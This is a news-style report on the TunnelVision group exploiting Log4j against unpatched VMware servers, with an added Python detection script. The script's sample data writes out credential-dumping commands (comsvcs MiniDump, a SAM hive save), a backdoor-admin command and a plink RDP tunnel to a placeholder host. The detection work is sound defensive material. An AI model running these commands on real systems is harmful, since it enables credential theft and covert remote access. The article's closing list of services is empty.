Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware. The group has been dubbed TunnelVision.
The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. Earlier, TunnelVision exploited so-called 1-day vulnerabilities, meaning vulnerabilities that have only recently been patched, to hack organizations that had yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets.
TunnelVision has started exploiting a critical vulnerability in Log4j, an open source logging utility that is integrated into thousands of apps. CVE-2021-44228 allows attackers to easily gain remote control over computers running apps written in the Java programming language.
TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials, and perform lateral movement. The threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PowerShell reverse shells executed via the Tomcat process.
Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell reverse shell used here appears to be a variant of a publicly available one. Once it is installed, TunnelVision members use it to:
- Execute reconnaissance commands
- Create a backdoor user and add it to the network administrators group
- Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump
- Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic
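A host-side triage for the post-exploitation steps listed above, added here as an example and not taken from the article or from any vendor report: it runs simple pattern rules over constructed Sysmon-style process-creation records. The process paths, sample command lines and regular expressions are this example's own assumptions.

```python
import re

# Constructed Sysmon-style process-creation records (parent image, image,
# command line). Sample data for this example; not taken from the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\tomcat\bin\tomcat9.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c <redacted>"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 612 C:\Windows\Temp\m.dmp full"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg save HKLM\SAM C:\Windows\Temp\sam.hiv"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net localgroup administrators svc_backup /add"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\Temp\plink.exe",
     "cmd": "plink.exe -N -R 0.0.0.0:3389:127.0.0.1:3389 user@203.0.113.10"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Service"},  # benign: interactive admin, no hit
]
# Each rule maps one TunnelVision post-exploitation step named in the article
# to a process-creation pattern. The regexes are this example's own choices.
TOMCAT_PARENT = re.compile(r"\\(tomcat\w*|java)\.exe$", re.I)
RULES = [
    ("powershell_spawned_by_tomcat",          # PS reverse shell run via Tomcat
     lambda e: bool(TOMCAT_PARENT.search(e["parent"]))
               and "powershell" in e["image"].lower()),
    ("comsvcs_minidump",                      # LSASS dump via comsvcs.dll
     lambda e: "comsvcs" in e["cmd"].lower() and "minidump" in e["cmd"].lower()),
    ("procdump_lsass",                        # credential harvest with ProcDump
     lambda e: "procdump" in e["image"].lower() and "lsass" in e["cmd"].lower()),
    ("sam_hive_save",                         # offline SAM hive dump
     lambda e: re.search(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", e["cmd"], re.I)),
    ("local_admin_group_add",                 # backdoor user added to admins
     lambda e: re.search(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", e["cmd"], re.I)),
    ("tunneling_tool_rdp",                    # Plink/Ngrok tunnel carrying RDP
     lambda e: re.search(r"\\(plink|ngrok)\.exe$", e["image"], re.I)
               and "3389" in e["cmd"]),
]

def triage(events):
    """Return (event index, rule name) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        for name, pred in RULES:
            if pred(ev):
                hits.append((i, name))
    return hits

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmd']}")
```

The rules are deliberately narrow; in a real deployment you would pair them with the network check the article recommends (unexplained outbound connections to tunneling services).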
The hackers use multiple legitimate services to carry out and obscure their activities. Those services include:
People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.